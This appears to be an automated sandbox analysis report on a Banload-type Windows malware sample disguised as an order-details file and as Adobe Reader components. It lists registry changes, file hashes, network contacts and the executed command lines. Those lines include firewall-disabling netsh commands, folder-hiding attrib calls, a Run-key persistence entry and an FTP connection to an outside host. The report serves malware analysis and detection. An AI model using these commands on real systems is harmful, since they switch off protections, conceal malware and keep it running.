Analysis Overview
SHA256
a3ff31d8a37c4123f6243094e5f6dcd4fd62f65acae61a01e88a6db4b86b6262
Threat Level: Known bad
The file e68955f1a523d07e92763cd62bd0969a_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Sets file to hidden
Modifies Windows Firewall
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Reads local data of messenger clients
Checks BIOS information in registry
Reads user/profile data of local email clients
Checks computer location settings
Adds Run key to start application
Accesses Microsoft Outlook accounts
Enumerates physical storage devices
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
System Location Discovery: System Language Discovery
Gathers network information
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies registry class
Views/modifies file attributes
NTFS ADS
Suspicious use of WriteProcessMemory
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-09-17 09:41
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-17 09:41
Reported
2024-09-17 09:44
Platform
win7-20240704-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
Banload
Credentials from Password Stores: Credentials from Web Browsers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Reads local data of messenger clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeA = "C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\Adobe Inc\\AdobeRead\\acro4.bat" | C:\Windows\SysWOW64\reg.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Order details 20160623085712.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\DllHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\xcopy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\xcopy.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID\ = "msinkaut.InkPicture" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Control | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ = "%CommonProgramFiles%\\Microsoft Shared\\Ink\\InkObj.dll" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\MiscStatus | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\MiscStatus\1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID\ = "msinkaut.InkPicture.1" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Programmable | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\InprocServer32\ThreadingModel = "Apartment" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\MiscStatus\ = "0" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ProgID | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ToolboxBitmap32 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib\ = "{7D868ACD-1A5D-4a47-A247-F39741353012}" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version\ = "1.0" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187} | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ = "Microsoft InkPicture Control" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\ToolboxBitmap32\ = "%CommonProgramFiles%\\Microsoft Shared\\Ink\\InkObj.dll, 212" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\TypeLib | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Version | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\VersionIndependentProgID | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\Insertable | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{37EDC348-F7AF-59EA-E1CC-DDFB47F24187}\MiscStatus\1\ = "131473" | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe | N/A |
| File created | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
| File opened for modification | C:\ProgramData\TEMP:663565B1 | C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\DllHost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Order details 20160623085712.exe
"C:\Users\Admin\AppData\Local\Temp\Order details 20160623085712.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat" /quiet /passive /norestart"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
C:\Windows\SysWOW64\xcopy.exe
xcopy /y /h /e /r /k /c *.* "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\AdobeR"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\Adobe Reader\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER"
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Roaming\AdobeR"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adob9.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\rea01.bat" /quiet /passive /norestart"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:01.klm ftp.freehostia.com -s
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "AdobeA" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\acro4.bat"
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr01.exe
adbr01.exe -f "011.011"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\adbr02.exe
adbr02.exe -f "112.112"
C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode disable
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set profiles state off
C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\Adobeta.exe
Adobeta.exe -a -c -d -natpasv -s:004.afq ftp.freehostia.com
C:\Users\Admin\AppData\Roaming\Adobe\Adobe Inc\AdobeRead\AReader.exe
AReader 5400
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ftp.freehostia.com | udp |
| US | 198.23.57.8:21 | ftp.freehostia.com | tcp |
Files
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobedc.vbs
| MD5 | ce8041824149d8266dbb0ad9688224d7 |
| SHA1 | 3ab653c43ce66681ceaab90193e1a4c95d998090 |
| SHA256 | 0a697bf8507b3f517afe7d67ed0f12f1a8d0edbb72252d75cc7677d6e2e638c5 |
| SHA512 | e1a205a1665fe5beb3c53cdcff4eb9c66a4773d730215ff87a179f3c825d342f8f7e8b5e65e45e6a1f13dfe7f58a09f5a920ce9416fe231d74ad1d99e60bd21d |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob03.bat
| MD5 | 97410477dc9501dffca4ea4b1ae57273 |
| SHA1 | fb573b3bf4eba734b0f32db1a5b7ff78de36b064 |
| SHA256 | 3836545f759c1ff93892ea0ef81424c8acdef7dc9440e8404bc04662fe7e6f2c |
| SHA512 | 3d22d0bf5375f3cedc7f6bdc0b2fac8de834a1b80567a2395046c5aada74d87e8338fbd0f787b14dbe3f5914c9a751597f1332d89d19f6d96de195ef334cc915 |
memory/2752-73-0x0000000000360000-0x0000000000362000-memory.dmp
memory/2696-74-0x0000000000110000-0x0000000000112000-memory.dmp
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\004.afq
| MD5 | 7e3ac90901e9c805b04ae5517a642547 |
| SHA1 | b196397ef641ab1b37d3478abed7523ba703de17 |
| SHA256 | 69b2ff2f6434f34617b71fd775f0c67e21798d7e71705f2f5e9d839016c3072a |
| SHA512 | d76e4baa26b7984c97ad53f904bfcd19600ff90d4e28aa9120bfafefd13abf147f0afce3edd6a0ee3a58d7d8c4b89943ff851cdc1ba56e7de3899defcf7bde6f |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\acro4.bat
| MD5 | 89412aba215b6cd18b8a64c4485fa03f |
| SHA1 | 37089346499f54a7d89262a67d95c8764ab3ca1f |
| SHA256 | 9607fb2a0e2ea02cd674272680a238d21539071db3c9735818a1abf11ff30ff1 |
| SHA512 | 7afe571b9ad4b67fdf00cecade8645e82471c1c5098b563a2e2d0cff96905f34b6071eb93c86f59850335e7e88d988d6c016553cdbbe1a693e1cdc3082a3790b |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr01.exe
| MD5 | 3351585db91521d6fa543490ac7cd6a5 |
| SHA1 | 9be2b3abf17613d7386f9949cabaedd466902e82 |
| SHA256 | 3f1749d4a96eb85fe2104fef8d871d9696b456615ff3775d484cc2c2431f40b4 |
| SHA512 | 804b293c02a5526b8c7d5dc48edc18cb33e06a07b39a0b3f46d8d34387e1848b245b087fd820a4a14ac4866c85a120837217ddc9bb47ef32e1b5b80f0dc66d30 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\adbr02.exe
| MD5 | 75a35514185cd2c5cf5aab50cc380963 |
| SHA1 | f1ff1e088f910398a48f4f7dfddec24e6d6d1734 |
| SHA256 | 1cf5eb2f7c5cd5b7d036478d30408212494ab73190172c63df67e66350374937 |
| SHA512 | ca6bb433fe5fd4ea350dfa40dd80bb6913ea4693b6ba6188e67f55e4211db9975fd7af570546bce0fd877a3bfeceadd4da9ba9c46c6cb69f9963914739e16297 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adob9.vbs
| MD5 | 09082253605a7171f078e26dc308a667 |
| SHA1 | 585286c9fcda5e66e7fdb4e17a7bab6160183d46 |
| SHA256 | f4c67dc01ce4bf55e1b574009c49d481dad0d33070f53f42bc76807eb5e324ed |
| SHA512 | adb4a1fec6feada14b8b4f28730e098a0af19f1e7c2fa0fe684030d1171e56c88813661a2352ce598221853fce3dc8a4bb3b2e1dc80b6471c41d2598f635b1d8 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\AReader.exe
| MD5 | 1a1075e5e307f3a4b8527110a51ce827 |
| SHA1 | f453838ed21020b7ca059244feea8579e5aa74ef |
| SHA256 | ddd90e3546e95b0991df26a17cf26fa2f1c20d6a1fd4ffccf1e9b3ec3d3810d5 |
| SHA512 | b6b70c6cb3cdb05a69c75b86c1fa0fadb38de0391e1fa17daff7d12dfae2a9f483546d9bf1001ff622694fdf8a28b85cd30fc541c25be62df022d22ca17decc1 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\Adobeta.exe
| MD5 | 97b8dbcc7b3cc290aef4241df911ac2e |
| SHA1 | 733ababbcd278821d4e3ee78580841981f26642e |
| SHA256 | c44ca1fe145c4f0dcea4efb95171cbf16dfec9fe66a603fbe29c94c21050a023 |
| SHA512 | 4adaa7621e2c858e6541792146260142e1d28683ec1515a743a56bc106ab425edfce856ef3b0d146d63704b34694c9e666a39e3845a097d41cbf465537ec9b25 |
C:\Users\Admin\AppData\Roaming\AdobeR\ADBR\READER\rea01.bat
| MD5 | ce7ccd3b48dbe8f34db3b2b1222e4fd9 |
| SHA1 | e25f9947c2b250c98dffd7bfeaca75b4db17dcfd |
| SHA256 | 6374a35588bd20362e54dff9e8cf0dffba5ba0ec5952a08fb51caea54c5d228e |
| SHA512 | ee6b389f29d30a572c7c9837575df7ff197589824c5377f02b7c453572139d4ecc75c5b194a601b953fbb7e692b3929faf8c4e14e7fec51cd25d71658636ef99 |
memory/2116-126-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1160-124-0x0000000002660000-0x0000000002914000-memory.dmp
memory/1160-123-0x0000000002660000-0x0000000002914000-memory.dmp
memory/2228-129-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2228-130-0x0000000002740000-0x000000000294C000-memory.dmp
memory/2228-134-0x0000000002740000-0x000000000294C000-memory.dmp
memory/2228-141-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2228-142-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2228-144-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2228-145-0x0000000002740000-0x000000000294C000-memory.dmp
memory/2228-143-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/2228-148-0x0000000002740000-0x000000000294C000-memory.dmp
memory/2228-154-0x0000000002740000-0x000000000294C000-memory.dmp
memory/2116-158-0x0000000000400000-0x00000000006B4000-memory.dmp
memory/1160-163-0x0000000002660000-0x0000000002917000-memory.dmp
memory/2432-169-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/2592-168-0x00000000024D0000-0x0000000002787000-memory.dmp
memory/2592-167-0x0000000000400000-0x00000000006B7000-memory.dmp
memory/1160-165-0x0000000002660000-0x0000000002917000-memory.dmp
memory/2432-170-0x0000000002670000-0x000000000287C000-memory.dmp
memory/2432-174-0x0000000002670000-0x000000000287C000-memory.dmp
C:\ProgramData\TEMP\RAIDTest
